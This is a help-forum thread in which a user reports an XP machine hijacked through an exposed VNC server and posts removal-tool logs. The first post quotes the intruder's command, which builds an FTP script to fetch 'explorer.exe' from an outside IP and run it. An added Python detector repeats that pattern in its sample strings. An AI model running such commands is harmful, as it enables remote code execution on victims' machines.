
Computer Hijacked


12 replies to this topic

#1 Novicode


Posted 31 October 2012 - 05:44 PM

Ok, I run a 24/7 Minecraft server (and a few other servers) on my old Dell, which I refer to as "the server", and connect to it using VNC. After leaving for dinner (it took 41 minutes), I came back and took a look at the other monitor with the server PC on it. There was a command prompt window open which said this:

"Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>del eq&echo open 190.37.236.107 7836 >> eq&echo user 21313 23121 >> eq &echo get explorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &explorer.exe &del eq
Could Not Find C:\WINDOWS\system32\eq
ftp> open 190.37.236.107 7836
Connected to 190.37.236.107.
220 StnyFtpd 0wns j0
ftp> user 21313 23121
331 Password required
230 User logged in.
ftp> get explorer.exe
200 PORT command successful.
150 Opening BINARY mode data connection"

This alarmed me, and after doing some research I found that someone was trying to hijack the computer. By the time I got back, nothing was happening, though. I traced it back to me being an idiot and opening the VNC server ports wide open to the internet without any encryption so my friend could connect. At that point I remember thinking, "Eh, why bother closing ports. Who would find my PC anyways?" I now see I was wrong, VERY wrong. When I opened Start and clicked "Run" to open a cmd window, the hijacker had typed this in: "%systemroot%\system32\cmd.exe". I'm guessing he opened Command Prompt that way and accessed FTP whatever through that.

I have now closed all ports to my computer and encrypted VNC. All connections also have to be made through password-protected Hamachi, and all connections need to be approved. But I'm still wondering what he did, what damage has been done, and how can I fix it?

Any help would be greatly appreciated, Thank you.

Edited by hamluis, 31 October 2012 - 07:19 PM.
Moved from XP to Am I Infected - Hamluis.
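The command line shown in the post above builds an FTP script with echo, runs it with ftp -n -s:, and then launches the file it fetched. The following Python check is an added example, not part of the original thread: it flags that shape in logged cmd.exe command lines. The function name analyze, the verdict labels and the sample inputs are constructed for illustration (addresses come from the documentation range 192.0.2.0/24).

```python
import ntpath
import re

# "echo <text> >> <file>" is how the script is assembled line by line.
ECHO_RE = re.compile(r'^echo\s+(?P<text>.*?)\s*>{1,2}\s*(?P<file>\S+)$', re.I)
FTP_RE = re.compile(r'^ftp(?:\.exe)?(?:\s+(?P<args>.*))?$', re.I)
# Windows ftp.exe reads its commands from the file given with -s:<file>.
SCRIPT_ARG_RE = re.compile(r'(?:^|\s)-s:(?P<file>\S+)', re.I)

# Constructed sample command lines (not taken from any real log).
SAMPLES = {
    "dropper": r"del eq&echo open 192.0.2.10 7836 >> eq&echo user u p >> eq "
               r"&echo get explorer.exe >> eq &echo quit >> eq "
               r"&ftp -n -s:eq &explorer.exe &del eq",
    "fetch_only": r"echo open 192.0.2.10 >> s&echo get a.zip >> s&ftp -s:s",
    "admin_job": r"ftp -s:C:\scripts\nightly.txt backup.example.internal",
    "plain_echo": r"echo hello >> notes.txt & type notes.txt",
}


def _read_script(lines, result):
    """Pull the server and the downloaded file names out of the FTP script."""
    for line in lines:
        parts = line.split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) >= 2:
            result["host"] = parts[1]
            has_port = len(parts) >= 3 and parts[2].isdigit()
            result["port"] = int(parts[2]) if has_port else 21
        elif verb in ("get", "recv") and len(parts) >= 2:
            # "get remote [local]": the file lands under the last name given.
            result["downloads"].append(ntpath.basename(parts[-1]).lower())


def analyze(cmdline):
    """Classify one cmd.exe command line; returns a dict of findings."""
    # cmd.exe runs '&'-separated commands in order. Quoted or ^-escaped
    # ampersands are not handled here (simplifying assumption).
    segments = [s.strip() for s in re.split(r'&+', cmdline) if s.strip()]
    scripts = {}  # file name -> lines echoed into it so far
    result = {"host": None, "port": None, "downloads": [],
              "inline_script": False, "executed": [], "verdict": "benign"}
    for seg in segments:
        m = ECHO_RE.match(seg)
        if m:
            scripts.setdefault(m["file"].lower(), []).append(m["text"])
            continue
        m = FTP_RE.match(seg)
        if m:
            s = SCRIPT_ARG_RE.search(m["args"] or "")
            # Only a script written earlier in the same chain counts as inline;
            # a script file that already exists on disk is left as benign.
            if s and s["file"].lower() in scripts:
                result["inline_script"] = True
                _read_script(scripts[s["file"].lower()], result)
            continue
        words = seg.split()
        if words[0].lower() == "start" and len(words) > 1:
            words = words[1:]
        # cmd.exe looks in the current directory before PATH, so a download
        # named like a Windows binary runs instead of the real one.
        prog = ntpath.basename(words[0]).lower()
        if prog in result["downloads"]:
            result["executed"].append(prog)
    if result["inline_script"] and result["executed"]:
        result["verdict"] = "dropper"
    elif result["inline_script"]:
        result["verdict"] = "suspicious"
    return result


if __name__ == "__main__":
    for name, line in SAMPLES.items():
        r = analyze(line)
        print(name, r["verdict"], r["host"], r["port"], r["downloads"])
```
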




#2 dev00790


Posted 06 November 2012 - 05:58 PM

Hello,

I will be helping you with your problems. Please be patient while I assist you.

Some points for you to keep in mind while I am helping you, to make things go easier and faster for both of us:

  • Please do NOT run, install or uninstall any programs, unless instructed to do so.
    • We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
  • Please do not attach logs or use code boxes, just copy and paste the text.
    • Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.
  • Please read every post completely before doing anything.
    • Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.
  • Please provide feedback about your experience as we go.
    • A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.

NOTE: At the top of your post, click on the Watch Topic Button, select Immediate Notification, and click on Proceed. This will send you an e-mail as soon as I reply to your topic, allowing us to resolve the issue faster.

NOTE: Back up any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartaches if things don't go as planned. You can put them on a CD/DVD, external drive or a pen drive, anywhere except on the computer.

NOTE: It is good practice to copy and paste the instructions into notepad and print them in case it is necessary for you to go offline during the cleanup process. To open notepad, navigate to Start Menu > All Programs > Accessories > Notepad. Please remember to copy the entire post so you do not miss any instructions.

----------------------------------------------

Please do the following:

Step 1:

Please download the TDSS Rootkit Removing Tool (TDSSKiller.exe) and save it to your Desktop. <-Important!!!
  • Double-click on TDSSKiller.exe on your desktop to run the tool for known TDSS variants.
    Vista/Windows 7 users right-click and select Run As Administrator.
  • If TDSSKiller does not run, try renaming it.
  • To do this, right-click on TDSSKiller.exe, select Rename and give it a random name with the .com file extension (i.e. 123abc.com). If you do not see the file extension, please refer to How to change the file extension.
  • Click on change parameters
  • Under Objects to scan, check the box next to Loaded modules
  • If you are asked to reboot, then click Yes.

Next

  • Check the boxes next to Loaded modules, Verify file digital signatures, Detect TDLFS file system, then click OK.
  • Click the Start Scan button.
  • Do not use the computer during the scan
  • If the scan completes with nothing found, click Close to exit.
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
  • Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.
    Note: If Cure is not an option, Skip instead, do NOT choose Delete or Quarantine unless instructed.
  • A log file named TDSSKiller_version_date_time_log.txt (i.e. TDSSKiller.2.4.0.0_27.07.2010_09.o7.26_log.txt) will be created and saved to the root directory (usually Local Disk C:).
  • Copy and paste the full contents of that file in your next reply. - If the log is too long, then split it into multiple posts.


Step 2:

Download Security Check by screen317 from here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the full contents of that document.


Step 3:

Please download Farbar Service Scanner and run it on the computer with the issue.
  • Make sure the following options are checked:
    • Internet Services
    • Windows Firewall
    • System Restore
    • Security Center/Action Center
    • Windows Update
    • Windows Defender
    • Other Services
  • Press Scan.
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the full contents of the log in your next reply.


Step 4:

Please download MiniToolBox, save it to your desktop and run it.

Checkmark the following checkboxes:
  • Flush DNS
  • Report IE Proxy Settings
  • Reset IE Proxy Settings
  • Report FF Proxy Settings
  • Reset FF Proxy Settings
  • List content of Hosts
  • List IP configuration
  • List Winsock Entries
  • List last 10 Event Viewer log
  • List Installed Programs
  • List Devices (Only Problems)
  • List Users, Partitions and Memory size.
  • List Minidump Files
  • List Restore points
NOTE: When using "Reset FF Proxy Settings" option Firefox should be closed.

Click Go and post the full contents of the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.

Regards, dev00790

---------------------------------------

Marge: "Homer, the plant called. They said if you don't show up tomorrow don't bother showing up on Monday." Homer: "Woo-hoo! Four-day weekend!"

I do not reply to Private Messages (PMs) asking for assistance - please use the forums instead. If I have been helping you, and I have not replied to your latest post in 48 hours please send me a PM.


#3 Novicode


Posted 06 November 2012 - 07:11 PM

TDSS Log:

18:40:36.0875 5156 TDSS rootkit removing tool 2.8.15.0 Oct 31 2012 21:47:35
18:40:37.0375 5156 ============================================================
18:40:37.0375 5156 Current date / time: 2012/11/06 18:40:37.0375
18:40:37.0375 5156 SystemInfo:
18:40:37.0375 5156
18:40:37.0375 5156 OS Version: 5.1.2600 ServicePack: 3.0
18:40:37.0375 5156 Product type: Workstation
18:40:37.0375 5156 ComputerName: SERVER
18:40:37.0375 5156 UserName: Joe
18:40:37.0375 5156 Windows directory: C:\WINDOWS
18:40:37.0375 5156 System windows directory: C:\WINDOWS
18:40:37.0375 5156 Processor architecture: Intel x86
18:40:37.0375 5156 Number of processors: 1
18:40:37.0375 5156 Page size: 0x1000
18:40:37.0375 5156 Boot type: Normal boot
18:40:37.0375 5156 ============================================================
18:40:43.0609 5156 Drive \Device\Harddisk0\DR0 - Size: 0x12A05F2000 (74.51 Gb), SectorSize: 0x200, Cylinders: 0x25FE, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000054
18:40:43.0671 5156 ============================================================
18:40:43.0671 5156 \Device\Harddisk0\DR0:
18:40:43.0765 5156 MBR partitions:
18:40:43.0765 5156 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x139C5, BlocksNum 0x8EE9870
18:40:43.0765 5156 ============================================================
18:40:43.0953 5156 C: <-> \Device\Harddisk0\DR0\Partition1
18:40:44.0000 5156 ============================================================
18:40:44.0000 5156 Initialize success
18:40:44.0000 5156 ============================================================
18:41:12.0171 2196 Deinitialize success

Security Check:


Results of screen317's Security Check version 0.99.54
Windows XP Service Pack 3 x86
Internet Explorer 6 Out of date!
``````````````Antivirus/Firewall Check:``````````````
Windows Firewall Enabled!
AVG 2013
`````````Anti-malware/Other Utilities Check:`````````
JavaFX 2.1.1
Java™ 6 Update 31
Java™ 7 Update 5
Java 2 Runtime Environment, SE v1.4.2_03
Java version out of Date!
````````Process Check: objlist.exe by Laurent````````
AVG avgwdsvc.exe
AVG avgrsx.exe
AVG avgemc.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C:: 33% Defragment your hard drive soon! (Do NOT defrag if SSD!)
````````````````````End of Log``````````````````````

Farbar Service Scanner:


Farbar Service Scanner Version: 07-11-2012
Ran by Joe (administrator) on 06-11-2012 at 19:05:16
Running from "C:\Documents and Settings\All Users\Desktop"
Microsoft Windows XP Home Edition Service Pack 3 (X86)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo IP is accessible.
Yahoo.com is accessible.


Windows Firewall:
=============

Firewall Disabled Policy:
==================


System Restore:
============

System Restore Disabled Policy:
========================

MiniToolBox:


MiniToolBox by Farbar Version: 07-11-2012
Ran by Joe (administrator) on 06-11-2012 at 19:09:59
Microsoft Windows XP Home Edition Service Pack 3 (X86)
Boot Mode: Normal
***************************************************************************

========================= Flush DNS: ===================================

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========================= IE Proxy Settings: ==============================

Proxy is not enabled.
No Proxy Server is set.

"Reset IE Proxy Settings": IE Proxy Settings were reset.
========================= Hosts content: =================================


127.0.0.1 localhost
127.0.0.1 localhost
127.0.0.1 localhost
127.0.0.1 localhost
127.0.0.1 localhost

========================= IP Configuration: ================================

Intel® PRO/100 VE Network Connection = Local Area Connection (Connected)
Hamachi Network Interface = Hamachi (Connected)


# ----------------------------------
# Interface IP Configuration
# ----------------------------------
pushd interface ip


# Interface IP Configuration for "Hamachi"

set address name="Hamachi" source=dhcp
set dns name="Hamachi" source=dhcp register=NONE
set wins name="Hamachi" source=dhcp

# Interface IP Configuration for "Local Area Connection"

set address name="Local Area Connection" source=static addr=10.0.0.4 mask=255.255.255.0
set address name="Local Area Connection" gateway=10.0.0.1 gwmetric=0
set dns name="Local Area Connection" source=static addr=8.8.8.8 register=PRIMARY
add dns name="Local Area Connection" addr=8.8.4.4 index=2
set wins name="Local Area Connection" source=static addr=none


popd
# End of interface IP configuration



Windows IP Configuration

Host Name . . . . . . . . . . . . : SERVER
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Hamachi:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Hamachi Network Interface
Physical Address. . . . . . . . . : 7A-79-05-2C-17-75
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : No
IP Address. . . . . . . . . . . . : 5.44.23.117
Subnet Mask . . . . . . . . . . . : 255.0.0.0
Default Gateway . . . . . . . . . :
DHCP Server . . . . . . . . . . . : 5.0.0.1
Lease Obtained. . . . . . . . . . : Tuesday, November 06, 2012 6:45:11 PM
Lease Expires . . . . . . . . . . : Wednesday, November 06, 2013 6:45:11 PM

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel® PRO/100 VE Network Connection
Physical Address. . . . . . . . . : 00-13-20-E2-40-C3
Dhcp Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 10.0.0.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.0.1
DNS Servers . . . . . . . . . . . : 8.8.8.8
8.8.4.4
Server: google-public-dns-a.google.com
Address: 8.8.8.8

Name: google.com
Addresses: 74.125.226.233, 74.125.226.228, 74.125.226.226, 74.125.226.238
74.125.226.227, 74.125.226.232, 74.125.226.231, 74.125.226.229, 74.125.226.224
74.125.226.230, 74.125.226.225


Pinging google.com [74.125.226.233] with 32 bytes of data:

Reply from 74.125.226.233: bytes=32 time=49ms TTL=55
Reply from 74.125.226.233: bytes=32 time=49ms TTL=55

Ping statistics for 74.125.226.233:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 49ms, Maximum = 49ms, Average = 49ms
Server: google-public-dns-a.google.com
Address: 8.8.8.8

Name: yahoo.com
Addresses: 72.30.38.140, 98.138.253.109, 98.139.183.24


Pinging yahoo.com [72.30.38.140] with 32 bytes of data:

Reply from 72.30.38.140: bytes=32 time=238ms TTL=56
Reply from 72.30.38.140: bytes=32 time=143ms TTL=56

Ping statistics for 72.30.38.140:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 143ms, Maximum = 238ms, Average = 190ms
Server: google-public-dns-a.google.com
Address: 8.8.8.8

Name: bleepingcomputer.com
Address: 208.43.87.2


Pinging bleepingcomputer.com [208.43.87.2] with 32 bytes of data:

Request timed out.
Request timed out.

Ping statistics for 208.43.87.2:
Packets: Sent = 2, Received = 0, Lost = 2 (100% loss),

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms TTL=64
Reply from 127.0.0.1: bytes=32 time<1ms TTL=64

Ping statistics for 127.0.0.1:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x2 ...7a 79 05 2c 17 75 ...... Hamachi Network Interface
0x3 ...00 13 20 e2 40 c3 ...... Intel® PRO/100 VE Network Connection - Packet Scheduler Miniport
===========================================================================
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.0.0.1 10.0.0.4 20
5.0.0.0 255.0.0.0 5.44.23.117 5.44.23.117 20
5.44.23.117 255.255.255.255 127.0.0.1 127.0.0.1 20
5.255.255.255 255.255.255.255 5.44.23.117 5.44.23.117 20
10.0.0.0 255.255.255.0 10.0.0.4 10.0.0.4 20
10.0.0.4 255.255.255.255 127.0.0.1 127.0.0.1 20
10.255.255.255 255.255.255.255 10.0.0.4 10.0.0.4 20
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
224.0.0.0 240.0.0.0 5.44.23.117 5.44.23.117 20
224.0.0.0 240.0.0.0 10.0.0.4 10.0.0.4 20
255.255.255.255 255.255.255.255 5.44.23.117 5.44.23.117 1
255.255.255.255 255.255.255.255 10.0.0.4 10.0.0.4 1
Default Gateway: 10.0.0.1
===========================================================================
Persistent Routes:
None
========================= Winsock entries =====================================

Catalog5 01 C:\Windows\System32\mswsock.dll [245248] (Microsoft Corporation)
Catalog5 02 C:\Windows\System32\winrnr.dll [16896] (Microsoft Corporation)
Catalog5 03 C:\Windows\System32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 01 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 02 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 03 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 04 C:\Windows\system32\rsvpsp.dll [92672] (Microsoft Corporation)
Catalog9 05 C:\Windows\system32\rsvpsp.dll [92672] (Microsoft Corporation)
Catalog9 06 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 07 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 08 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 09 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 10 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 11 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 12 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 13 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 14 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 15 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 16 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)
Catalog9 17 C:\Windows\system32\mswsock.dll [245248] (Microsoft Corporation)

========================= Event log errors: ===============================

Application errors:
==================
Error: (10/31/2012 04:09:47 PM) (Source: WinVNC4) (User: )
Description: SocketManager: unknown listener event: 0

Error: (10/31/2012 07:37:56 AM) (Source: WinVNC4) (User: )
Description: SocketManager: unknown listener event: 0

Error: (10/31/2012 01:01:38 AM) (Source: WinVNC4) (User: )
Description: SocketManager: unknown listener event: 0

Error: (10/30/2012 11:14:37 PM) (Source: WinVNC4) (User: )
Description: SConnection: Assuming compatibility with version 3.3

Error: (10/30/2012 11:14:37 PM) (Source: WinVNC4) (User: )
Description: SConnection: Client uses unofficial protocol version 3.4

Error: (10/30/2012 11:08:09 PM) (Source: WinVNC4) (User: )
Description: SConnection: Assuming compatibility with version 3.3

Error: (10/30/2012 11:08:09 PM) (Source: WinVNC4) (User: )
Description: SConnection: Client uses unofficial protocol version 3.4

Error: (10/30/2012 11:01:32 PM) (Source: WinVNC4) (User: )
Description: SConnection: Assuming compatibility with version 3.3

Error: (10/30/2012 11:01:32 PM) (Source: WinVNC4) (User: )
Description: SConnection: Client uses unofficial protocol version 3.4

Error: (10/30/2012 10:54:43 PM) (Source: WinVNC4) (User: )
Description: SConnection: Assuming compatibility with version 3.3


System errors:
=============
Error: (11/06/2012 06:43:45 PM) (Source: Service Control Manager) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
IntelIde

Error: (11/06/2012 06:43:43 PM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (11/06/2012 06:43:43 PM) (Source: Service Control Manager) (User: )
Description: The LogMeIn Kernel Information Provider service failed to start due to the following error:
%%3

Error: (11/06/2012 06:43:43 PM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (11/04/2012 06:55:50 AM) (Source: Service Control Manager) (User: )
Description: The LogMeIn Kernel Information Provider service failed to start due to the following error:
%%3

Error: (11/04/2012 06:55:50 AM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (11/04/2012 06:55:50 AM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (11/01/2012 08:39:32 AM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (11/01/2012 08:39:32 AM) (Source: Service Control Manager) (User: )
Description: The LogMeIn Kernel Information Provider service failed to start due to the following error:
%%3

Error: (11/01/2012 08:39:32 AM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5


Microsoft Office Sessions:
=========================
Error: (10/31/2012 04:09:47 PM) (Source: WinVNC4)(User: )
Description: SocketManagerunknown listener event: 0

Error: (10/31/2012 07:37:56 AM) (Source: WinVNC4)(User: )
Description: SocketManagerunknown listener event: 0

Error: (10/31/2012 01:01:38 AM) (Source: WinVNC4)(User: )
Description: SocketManagerunknown listener event: 0

Error: (10/30/2012 11:14:37 PM) (Source: WinVNC4)(User: )
Description: SConnectionAssuming compatibility with version 3.3

Error: (10/30/2012 11:14:37 PM) (Source: WinVNC4)(User: )
Description: SConnectionClient uses unofficial protocol version 3.4

Error: (10/30/2012 11:08:09 PM) (Source: WinVNC4)(User: )
Description: SConnectionAssuming compatibility with version 3.3

Error: (10/30/2012 11:08:09 PM) (Source: WinVNC4)(User: )
Description: SConnectionClient uses unofficial protocol version 3.4

Error: (10/30/2012 11:01:32 PM) (Source: WinVNC4)(User: )
Description: SConnectionAssuming compatibility with version 3.3

Error: (10/30/2012 11:01:32 PM) (Source: WinVNC4)(User: )
Description: SConnectionClient uses unofficial protocol version 3.4

Error: (10/30/2012 10:54:43 PM) (Source: WinVNC4)(User: )
Description: SConnectionAssuming compatibility with version 3.3


=========================== Installed Programs ============================

Adobe Flash Player 11 ActiveX (Version: 11.1.102.63)
Advanced SystemCare 4 (Version: 4.2.0)
AiO_Scan (Version: 47.0.1.000)
AiOSoftware (Version: 47.0.1.000)
AOLIcon (Version: 1.00.0000)
AVG 2013 (Version: 13.0.2617)
AVG 2013 (Version: 13.0.2742)
AVG 2013 (Version: 2013.0.2742)
BufferChm (Version: 45.4.157.000)
Conexant D850 56K V.9x DFVc Modem
Copy (Version: 45.4.157.000)
CP_AtenaShokunin1Config (Version: 45.4.131.000)
cp_dwShrek2Albums1 (Version: 45.4.157.000)
cp_dwShrek2Cards1 (Version: 45.4.157.000)
CreativeProjects (Version: 45.4.157.000)
CreativeProjectsTemplates (Version: 45.4.157.000)
CueTour (Version: 45.4.157.000)
Dell Driver Reset Tool (Version: 1.02.0000)
Destinations (Version: 45.4.157.000)
Director (Version: 45.4.157.000)
DocProc (Version: 4.5.0.0)
DocumentViewer (Version: 45.4.157.000)
Easy Macro Recorder 4.4
Fax (Version: 47.0.1.000)
Google Chrome (Version: 22.0.1229.94)
HP Product Assistant (Version: 2.0.0.0)
HPSystemDiagnostics (Version: 1.6.0.0)
InstantShare (Version: 45.4.157.000)
Intel® Extreme Graphics 2 Driver (Version: 6.14.10.4299)
Intel® PRO Network Adapters and Drivers
Intel® PROSet for Wired Connections (Version: 8.00.5000)
Internet Explorer Default Page (Version: 1.00.03)
Java 2 Runtime Environment, SE v1.4.2_03 (Version: 1.4.2_03)
Java Auto Updater (Version: 2.1.6.0)
Java™ 6 Update 31 (Version: 6.0.310)
Java™ 7 Update 5 (Version: 7.0.50)
JavaFX 2.1.1 (Version: 2.1.1)
LogMeIn Hamachi (Version: 2.1.0.215)
Microsoft .NET Framework 1.1 (Version: 1.1.4322)
Microsoft .NET Framework 1.1 Security Update (KB2656353)
Microsoft .NET Framework 1.1 Security Update (KB2656370)
Microsoft .NET Framework 1.1 Security Update (KB979906)
Microsoft .NET Framework 2.0 Service Pack 2 (Version: 2.2.30729)
Microsoft .NET Framework 3.0 Service Pack 2 (Version: 3.2.30729)
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319)
Microsoft Base Smart Card Cryptographic Service Provider Package
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (Version: 9.0.21022)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (Version: 9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (Version: 10.0.40219)
Microsoft XNA Framework Redistributable 4.0 (Version: 4.0.20823.0)
MSXML 4.0 SP2 (KB954430) (Version: 4.20.9870.0)
MSXML 4.0 SP2 (KB973688) (Version: 4.20.9876.0)
No-IP DUC (Version: 3.0.4)
PanoStandAlone (Version: 45.4.157.000)
PhotoGallery (Version: 45.4.157.000)
ProductContext (Version: 47.1.14.000)
QFolder (Version: 1.00.0000)
QuickTime
Readme (Version: 47.0.1.000)
Scan (Version: 4.5.0.0)
ScannerCopy (Version: 4.5.0.0)
SkinsHP1 (Version: 45.4.157.000)
Steam (Version: 1.0.0.0)
TeamViewer 7 (Version: 7.0.12799)
Terraria
TrayApp (Version: 45.4.157.000)
Unload (Version: 4.5.0)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (Version: 1)
Update for Windows XP (KB2345886) (Version: 1)
Update for Windows XP (KB2492386) (Version: 1)
Update for Windows XP (KB2641690) (Version: 1)
Update for Windows XP (KB2661254-v2) (Version: 2)
Update for Windows XP (KB2718704) (Version: 1)
Update for Windows XP (KB2736233) (Version: 1)
Update for Windows XP (KB2749655) (Version: 1)
Update for Windows XP (KB951978) (Version: 1)
Update for Windows XP (KB955759) (Version: 1)
Update for Windows XP (KB955839) (Version: 1)
Update for Windows XP (KB967715) (Version: 1)
Update for Windows XP (KB968389) (Version: 1)
Update for Windows XP (KB971029) (Version: 1)
Update for Windows XP (KB971737) (Version: 1)
Update for Windows XP (KB973687) (Version: 1)
Update for Windows XP (KB973815) (Version: 1)
Update for Windows XP (KB976749) (Version: 1)
VNC Free Edition 4.1.3 (Version: 4.1.3)
WebFldrs XP (Version: 9.50.7523)
WebReg (Version: 45.4.157.000)
Windows Genuine Advantage Validation Tool (KB892130)
Windows Genuine Advantage Validation Tool (KB892130) (Version: 1.7.0069.2)
Windows Management Framework Core
Windows Media Format Runtime
Windows Media Player 10
Windows Media Player 10 (Version: 9.00.3636)
Windows XP Service Pack 3 (Version: 20080414.031525)

========================= Devices: ================================


========================= Memory info: ===================================

Percentage of memory in use: 49%
Total physical RAM: 509.98 MB
Available physical RAM: 259.62 MB
Total Pagefile: 4075.43 MB
Available Pagefile: 3786.16 MB
Total Virtual: 2047.88 MB
Available Virtual: 1980.96 MB

========================= Partitions: =====================================

1 Drive c: () (Fixed) (Total:71.46 GB) (Free:44.04 GB) NTFS
2 Drive d: (DBAN) (CDROM) (Total:0.01 GB) (Free:0 GB) CDFS

========================= Users: ========================================

User accounts for \\SERVER

Administrator ASPNET Guest
HelpAssistant Joe SUPPORT_388945a0

========================= Minidump Files ==================================

No minidump file found

========================= Restore Points ==================================

09-08-2012 20:41:14 System Checkpoint
10-08-2012 12:08:20 Installed Box Sync
11-08-2012 07:00:20 Software Distribution Service 3.0
11-08-2012 07:35:10 Printer Driver Microsoft XPS Document Writer Installed
12-08-2012 07:00:20 Software Distribution Service 3.0
13-08-2012 07:56:24 System Checkpoint
14-08-2012 08:05:24 System Checkpoint
15-08-2012 09:05:25 System Checkpoint
16-08-2012 07:00:16 Software Distribution Service 3.0
17-08-2012 07:26:41 System Checkpoint
18-08-2012 08:26:38 System Checkpoint
19-08-2012 09:26:38 System Checkpoint
20-08-2012 10:26:38 System Checkpoint
21-08-2012 11:26:38 System Checkpoint
22-08-2012 12:26:40 System Checkpoint
23-08-2012 13:26:38 System Checkpoint
24-08-2012 04:36:59 Installed Box Sync
25-08-2012 05:26:28 System Checkpoint
26-08-2012 06:26:27 System Checkpoint
27-08-2012 07:26:28 System Checkpoint
28-08-2012 08:26:28 System Checkpoint
29-08-2012 09:26:29 System Checkpoint
30-08-2012 10:26:31 System Checkpoint
31-08-2012 11:26:16 System Checkpoint
01-09-2012 12:26:15 System Checkpoint
02-09-2012 13:26:18 System Checkpoint
03-09-2012 14:26:16 System Checkpoint
04-09-2012 14:38:45 System Checkpoint
05-09-2012 15:26:15 System Checkpoint
06-09-2012 16:26:15 System Checkpoint
07-09-2012 17:38:35 System Checkpoint
09-09-2012 21:13:31 System Checkpoint
10-09-2012 21:29:09 System Checkpoint
11-09-2012 21:40:26 System Checkpoint
12-09-2012 22:25:12 System Checkpoint
13-09-2012 07:00:19 Software Distribution Service 3.0
14-09-2012 07:25:12 System Checkpoint
15-09-2012 08:25:12 System Checkpoint
16-09-2012 09:25:12 System Checkpoint
17-09-2012 10:25:13 System Checkpoint
18-09-2012 11:25:13 System Checkpoint
19-09-2012 12:25:13 System Checkpoint
20-09-2012 13:25:16 System Checkpoint
21-09-2012 14:25:13 System Checkpoint
22-09-2012 15:25:12 System Checkpoint
23-09-2012 07:00:24 Software Distribution Service 3.0
